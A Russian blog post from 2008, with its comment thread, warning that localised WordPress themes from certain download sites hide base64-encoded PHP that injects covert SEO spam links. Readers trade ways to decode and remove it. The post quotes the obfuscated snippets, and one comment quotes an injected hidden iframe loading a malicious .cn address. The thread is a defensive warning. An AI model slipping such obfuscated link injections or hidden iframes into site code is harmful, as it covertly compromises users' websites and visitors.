Неприятные сюрпризы русифицированных тем Wordpress
Просматривая образцы присылаемого блоггерами спама, наткнулся на вот такие сайты:
- wptheme.ru
- wptheme.us
- wpbox.ru
Доменные имена показались мне подозрительно созвучными с сокращением от Wordpress. Перешел я по ссылкам, и вижу: и правда, вроде как «белые» сайты по этой тематике.
Но не все так просто. На сайтах предлагают скачать русифицированные темы для Wordpress. Скачал я несколько таких тем и залез в код. В файле footer.php, отвечающем за формирование «подвала» страниц, я обнаружил вот такой зашифрованный фрагмент:
<? echo(base64_decode("0JvQvtC60LDQu9C40LfQsNGG0LjRjyA8YSBocm
VmPSJodHRwOi8vd3B3b3JsZC5ydSIgdGl0bGU9ItCc0LjRgCBXb3JkcHJlc3MiIHRhcmdld
D0iX2JsYW5rIj7QnNC40YAgV29yZHByZXNzPC9hPi4g0KLQtdC80LAg0L/QtdGA0LXQst
C10LTQtdC90LAg0L3QsCDRgdCw0LnRgtC1IDxhIGhyZWY9Imh0dHA6Ly93cHRoZW1lc
y5ydSIgdGl0bGU9ItCi0LXQvNGLINC00LvRjyBXb3JkcHJlc3MiIHRhcmdldD0iX2JsYW5rIj
7QotC10LzRiyDQtNC70Y8gV29yZHByZXNzPC9hPi4="));?>
Угадайте, что я обнаружил, когда расшифровал его?
Чтобы увидеть отгадку, нажмите Ctrl+A: к счастью, это был не вирус, а только лишь ссылки на сайты, эти файлы распространяющие, причем ссылки зашифрованы. Риторический вопрос: зачем же они зашифрованы?
Но и это еще не все. Пошел я изучать эти зараженные темы для Wordpress дальше. Открываю файл index.php (в других темах были «закладки» и в других файлах), отвечающий за формирование главной страницы. Батюшки святы, что я вижу!
Рубрика<?php $str = 'PGEgaHJlZj0iaHR0cDovL3d3dy53cHRoZW1lLnVzIiB0aXRsZT0i0KLQtdC80Ysg0LTQu9G
PIFdvcmRwcmVzcyI+OjwvYT4='; echo base64_decode($str);?>
Угадайте, что я обнаружил, когда расшифровал его?
Чтобы увидеть отгадку, нажмите Ctrl+A: после слова «Рубрика» идет двоеточие. Так вот, с этого самого двоеточия, (чтобы поставивший такую зараженную тему незадачливый блоггер не заметил) идет ссылочка на сайтик, которому ТИЦ и PageRank накручивают.
Нужны русифицированные темы, плагины, сам Wordpress? Не стоит скачивать их у мошенников, там могут быть разные подставы. Есть несколько правильных сайтов, например MyWordpress и Lecactus. В общем, знаете сами, предупредите других.
24 ноября 2008 в 11:16
Да, это давно известные мошенники. О них уже некоторые блоггеры отписывались, я сам наткнулся на кодированные темы с этих сайтов. Мне иногда на локализацию присылают темы от этих сайтов.
Что интересно, у авторов дизайна кодированных частей нет, это в процессе локализации появляется. Такая вот плата за русский язык…
24 ноября 2008 в 11:57
Еще один правильный сайт с темами - wordpress.org
24 ноября 2008 в 13:37
Так, а как лечить?
24 ноября 2008 в 13:43
лечится путем удаления этой строки
24 ноября 2008 в 13:56
Неужели я один такой “неправильный”? Когда ставил тему с одного из этих сайтов - прочекал вордпресс каким-то плагином на предмет подобных ссылок, нашел их, посчитал их вполне нормальным явлением для сайтов с темами, стер их нафиг и продолжил работать.
24 ноября 2008 в 15:16
Ну а почему бы автору перевода не поставить ссылку на раскручиваемый сайт?
Авторы тем также нередко ставят ссылки на себя, причем зашифровывают еще какую-нибудь точку с запятой или скобку, без которой PHP будет выдавать ошибку парсинга.
Понятно, что не совсем честно, но одну ссылку автору темы уж можно пожертвовать
24 ноября 2008 в 15:25
to zaartix
Так просо не пройдет, падает скин!
24 ноября 2008 в 16:28
to Silent
1. Перед и после кода вставляете метки, вроде БЕГИН и ЕНД
2. Открываете тему в бразуере, смотрите исходный код.
3. Вставляете то, что находится между метками на место закодированной части.
4. Ликуете.
24 ноября 2008 в 16:44
hooey, ссылки на авторов темы есть и так. Ссылки на переводчиков тоже обычно никто не убирает. Но вот тогда таким образом, шифруясь, насильно пихают людям ссылки, да еще на сайты, принадлежащие спамерам, то тут уж, извините, никаких ссылок.
24 ноября 2008 в 16:58
AlexNote, очень корявый способ, работать не будет. Так как в кодированную часть чаще всего вставляют, например, фигурную скобку } из PHP, а в конечном HTML-коде в браузере она показываться, разумеется, не будет. А без этой скобки скрипт не будет выполняться.
Нужно просто раскодировать base64-кодированный текст. В Notepad++, например, можно. Или echo base64_decode(’текст’);
24 ноября 2008 в 17:40
Небыло еще ни одной темы, чтобы этот корявый способ не сработал.
Видимо, корявое что-то другое=)
25 ноября 2008 в 20:41
hooey, так ведь ежели фигурную скобку убрать в шифрованную часть, скрипт и так не запустится.
25 ноября 2008 в 20:43
Запустится же. В тех темах, которые я видел, так и было.
25 ноября 2008 в 22:11
Люди добрые у меня тоже тема с сайта **theme.ru И я тоже нашел в се эти прибабахи
Открыл все файлы темы в Дримвивере и просто все стер. Все работает как и раньше 
25 ноября 2008 в 22:17
“”"Павел пишет: Ваш комментарий ожидает одобрения.
25 ноября 2008 в 22:11
Привет спамерам! Этот блог защищен плагином Parasite Eliminator, спамить его бесполезно.”"”
Круто :))) Это что значит? Меня что , в черный список внесли???? Афигеть :))) Или это у всех выскакивает?
К этому посту свой блог не приписал посмотрим, что будет)
25 ноября 2008 в 22:23
Кажисть записали :))) И почему это ? Кого это я спамил? :(((
25 ноября 2008 в 23:31
Павел, просто Вы в комментарии поместили ссылку на **theme.ru — а такие ссылки плагин не пропускает
Ваш же блог не в черном списке.
30 ноября 2008 в 13:24
[...] над спамерами Parasite Eliminator, написал статью о двухходовой модели спама, когда спамом рекламируется сайт Wordpress тем для блога, а [...]
3 декабря 2008 в 15:30
У меня кстати на одном из блогов тоже такая тема стояла, скачивал с wpthemes || ru. Можно тоже занести в список.
7 декабря 2008 в 14:24
Сегодня, зайдя на свой сайт, обнаружил синтаксическую ошибку index.php Залез во внутырь и обнаружил неправильно добавленную (кем-то) строчку:
Такая же строчка встретилась во всех index-ых файлах движка и тем.
Что за х?
7 декабря 2008 в 14:26
“html”"body”"iframe src=”http://hugetopnonfat || cn/in.cgi?id1000″ width=1 height=1 style=”visibility: hidden” “”/iframe”"/body”"/html”
вместо - “
15 декабря 2008 в 19:54
karter, веб-вирус. Проверяйте пароли для доступа к сайту и права доступа к файлам на сайте (вебсервер не должен иметь право в них писать).
12 января 2009 в 18:25
В одной из тем была вшита в код ещё и часть функционала. Помимо этого там был код тянущий с другого сервака ссылки с вешающий их. Победил просто и в лоб: сперва всё пишется в буфер, там регексами вырезается всё, что было внесено не мной, добавляется всё, что нужно мне и выплёвывается в браузер. Чтобы не парить сервер лишними запросами на левый сервак просто закрыл файерволом сервера доступ к этому серваку.
Проблема была в том, что было очень много уровней вложенности кода. Я расшифровал где-то итераций 20 - далее надоело и победил тупо и просто
16 апреля 2009 в 1:29
Можно еще по названию (в файле style.css вверху обычно указывается) найти оригинал темы, и заменить зашифрованные участки кода нормальными, оставив перевод без изменений.
Обидно, что красивые англоязычные темы для специализированных сайтов (авто, медицина, игры) практически все зашифрованы, ладно, если бы при этом ссылка на один сайт вела, а так минимум на три-четыре. Поэтому в основном беру темы с wordpress.org, темы там проверяются и должны соответствовать определенным стандартам, но их тоже нужно тестировать, поскольку многие имеют баги в шестом эксплорере.
А для своих сайтов уже отказалась от шаблонов, делаю дизайны сама. Пусть я потрачу 1-2 дня, зато дизайн будет уникальный (обычно такое же время тратиться чтобы найти готовую тему по вкусу и довести ее до ума).
1 сентября 2009 в 4:04
Есть плагин такой называется ТАС, кто не в курсе, ловит подобные вредоносные коды. Сейчас просматривала темки, все русифицированные были паленые. Так что я согласна с Анастасией, надо брать чистый шаблон и делать свой дизайн… несколько дней помучаешься, зато - уникальная тема, которой ни у кого нет. Как у меня, например, по теме аэрографии.
16 ноября 2009 в 9:46
Наткнулся на такую шутку с кодом и двоеточием в теме. Сам я чайник в этих веб-технологиях, но почитав эту статейку и включив моск, выпилил этот код к бениной маме… Дизайн не уехал никуда. А я получил полезный экспириенс
Спасибо!